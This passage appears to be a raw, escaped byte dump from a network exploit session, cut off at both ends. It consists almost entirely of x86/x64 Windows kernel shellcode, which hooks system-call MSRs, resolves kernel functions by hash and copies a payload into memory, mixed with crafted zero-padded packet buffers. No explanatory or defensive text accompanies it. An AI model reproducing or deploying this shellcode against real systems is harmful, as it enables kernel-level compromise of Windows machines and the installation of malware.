\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\x
f8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xe
b\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\
\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x
00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\
\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 21, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\
\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\
\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea 
H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0P